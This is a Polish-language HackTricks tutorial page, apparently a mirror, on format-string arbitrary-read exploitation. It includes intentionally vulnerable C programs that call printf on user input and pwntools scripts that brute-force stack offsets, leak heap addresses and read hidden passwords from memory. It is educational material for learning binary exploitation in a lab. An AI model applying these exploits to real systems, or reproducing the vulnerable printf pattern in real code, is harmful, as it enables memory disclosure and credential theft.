mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
6.9 KiB
6.9 KiB
Formatowanie łańcuchów - Przykład odczytu arbitralnego
Zacznij od zera i stań się ekspertem od hakowania AWS dzięki htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLANY SUBSKRYPCYJNE!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud na GitHubie.
Rozpoczęcie Odczytu Binarnego
Kod
#include <stdio.h>
int main(void) {
char buffer[30];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
return 0;
}
Skompiluj to przy użyciu:
clang -o fs-read fs-read.c -Wno-format-security -no-pie
Wykorzystanie
from pwn import *
p = process('./fs-read')
payload = f"%11$s|||||".encode()
payload += p64(0x00400000)
p.sendline(payload)
log.info(p.clean())
- Przesunięcie wynosi 11, ponieważ ustawienie kilku liter A i próbowanie siłowe z pętlą przesunięć od 0 do 50 wykazało, że przy przesunięciu 11 i dodatkowych 5 znakach (kreski pionowej
|w naszym przypadku) można kontrolować pełny adres. - Użyłem
%11$pz dopełnieniem, aż zobaczyłem, że adres to same 0x4141414141414141. - Łańcuch formatujący jest PRZED adresem, ponieważ printf przestaje czytać przy bajcie zerowym, więc jeśli wyślemy najpierw adres, a następnie łańcuch formatujący, printf nigdy nie dotrze do łańcucha formatującego, ponieważ znajdzie bajt zerowy wcześniej.
- Wybrany adres to 0x00400000, ponieważ to tutaj zaczyna się binarny plik (brak PIE)
#include <stdio.h>
#include <string.h>
char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
int main() {
char stack_password[20] = "secretStackPass"; // Password in stack
char input1[20], input2[20];
printf("Enter first password: ");
scanf("%19s", input1);
printf("Enter second password: ");
scanf("%19s", input2);
// Vulnerable printf
printf(input1);
printf("\n");
// Check both passwords
if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
printf("Access Granted.\n");
} else {
printf("Access Denied.\n");
}
return 0;
}
Skompiluj to przy użyciu:
clang -o fs-read fs-read.c -Wno-format-security
Odczytaj ze stosu
Zmienna stack_password zostanie przechowywana na stosie, ponieważ jest zmienną lokalną, więc wystarczy nadużyć printf, aby pokazać zawartość stosu. To jest exploit do BF pierwszych 100 pozycji, aby ujawnić hasła ze stosu:
from pwn import *
for i in range(100):
print(f"Try: {i}")
payload = f"%{i}$s\na".encode()
p = process("./fs-read")
p.sendline(payload)
output = p.clean()
print(output)
p.close()
W obrazie można zobaczyć, że możemy ujawnić hasło ze stosu na 10 pozycji:
Odczytaj dane
Uruchamiając ten sam exploit, ale z %p zamiast %s, możemy ujawnić adres sterty ze stosu na %25$p. Ponadto, porównując ujawniony adres (0xaaaab7030894) z pozycją hasła w pamięci w tym procesie, możemy uzyskać różnicę adresów:
Teraz nadszedł czas, aby dowiedzieć się, jak kontrolować 1 adres na stosie, aby uzyskać do niego dostęp z drugiej luki w ciągu znaków formatujących:
from pwn import *
def leak_heap(p):
p.sendlineafter(b"first password:", b"%5$p")
p.recvline()
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
return int(response, 16)
for i in range(30):
p = process("./fs-read")
heap_leak_addr = leak_heap(p)
print(f"Leaked heap: {hex(heap_leak_addr)}")
password_addr = heap_leak_addr - 0x126a
print(f"Try: {i}")
payload = f"%{i}$p|||".encode()
payload += b"AAAAAAAA"
p.sendline(payload)
output = p.clean()
print(output.decode("utf-8"))
p.close()
I jest możliwe zobaczyć to w próbie 14 z wykorzystanym przekazywaniem, możemy kontrolować adres:
Wykorzystanie
from pwn import *
p = process("./fs-read")
def leak_heap(p):
# At offset 25 there is a heap leak
p.sendlineafter(b"first password:", b"%25$p")
p.recvline()
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
return int(response, 16)
heap_leak_addr = leak_heap(p)
print(f"Leaked heap: {hex(heap_leak_addr)}")
# Offset calculated from the leaked position to the possition of the pass in memory
password_addr = heap_leak_addr + 0x1f7bc
print(f"Calculated address is: {hex(password_addr)}")
# At offset 14 we can control the addres, so use %s to read the string from that address
payload = f"%14$s|||".encode()
payload += p64(password_addr)
p.sendline(payload)
output = p.clean()
print(output)
p.close()
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF sprawdź PLANY SUBSKRYPCYJNE!
- Kup oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.